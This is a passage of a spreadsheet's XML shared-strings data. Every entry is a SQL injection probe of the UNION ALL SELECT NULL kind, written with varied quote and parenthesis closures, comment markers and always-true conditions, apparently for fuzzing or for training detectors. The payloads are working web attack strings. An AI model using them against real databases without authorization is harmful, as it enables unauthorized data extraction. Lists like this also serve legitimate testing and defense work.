    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "Cocq" = "Cocq</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "YHbr" = "YHbr</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "PXuB" = "PXuB</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "ZvTL" LIKE "ZvTL</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "bOdI" LIKE "bOdI</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "eTQo" LIKE "eTQo</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "sDxR" LIKE "sDxR</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "tRKH" LIKE "tRKH</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "dZHu" LIKE "dZHu</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "axie" LIKE "axie</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "mGXR" LIKE "mGXR</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "qzLD" LIKE "qzLD</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "zdus" LIKE "zdus</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "judS" LIKE "judS</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "Oszq" LIKE "Oszq</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "lRzE" LIKE "lRzE</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "oKpx" LIKE "oKpx</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "feqv" LIKE "feqv</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "ijRp" LIKE "ijRp</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "hBMJ" LIKE "hBMJ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "gfxL" LIKE "gfxL</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "Taoy" LIKE "Taoy</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "lVOL" LIKE "lVOL</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "kNsL" LIKE "kNsL</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "nmoP" LIKE "nmoP</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "ZVRt" LIKE "ZVRt</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "DLqS" LIKE "DLqS</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "MOlC" LIKE "MOlC</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "zWwY" LIKE "zWwY</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "WJLp" LIKE "WJLp</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "vHHH" LIKE "vHHH</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "qJSn" LIKE "qJSn</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "zvoT" LIKE "zvoT</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "GpJN" LIKE "GpJN</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "AAeY" LIKE "AAeY</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "nkvv" LIKE "nkvv</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "YSuV" LIKE "YSuV</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "tAGc" LIKE "tAGc</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "Grcf" LIKE "Grcf</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "QlkW" LIKE "QlkW</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "QuNn" LIKE "QuNn</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "phTo" LIKE "phTo</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "PKHA" LIKE "PKHA</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 2795 = 2795</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 7350 = 7350</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 4523 = 4523</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 3064 = 3064</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 747 = 747</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 8470 = 8470</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 6893 = 6893</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 1570 = 1570</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 1633 = 1633</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 269 = 269</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  6010 = 6010</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  5122 = 5122</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  549 = 549</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  8442 = 8442</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  5808 = 5808</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  3721 = 3721</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  7299 = 7299</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  1317 = 1317</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  9522 = 9522</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 2953 = 2953</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 7257 = 7257</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 5693 = 5693</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 7902 = 7902</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 2607 = 2607</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 6295 = 6295</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 3617 = 3617</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 8584 = 8584</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 3805 = 3805</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 5720 = 5720</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'LxPC' = 'LxPC</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'euvw' = 'euvw</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'OVWH' = 'OVWH</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'yyKK' = 'yyKK</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'cgoN' = 'cgoN</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'GhCq' = 'GhCq</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'jGrG' = 'jGrG</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'AmIp' = 'AmIp</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'ASrm' = 'ASrm</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'Yyup' = 'Yyup</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'MeFB' = 'MeFB</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'WqPp' = 'WqPp</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'zejL' = 'zejL</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'NHqO' = 'NHqO</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'oygE' = 'oygE</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'IaLP' = 'IaLP</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'NuhK' = 'NuhK</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'ZRSQ' = 'ZRSQ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'uTal' = 'uTal</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'DMru' = 'DMru</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'faSN' = 'faSN</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'kKSh' = 'kKSh</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'HQuO' = 'HQuO</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'JvQo' = 'JvQo</t>
  </si>
  <si>
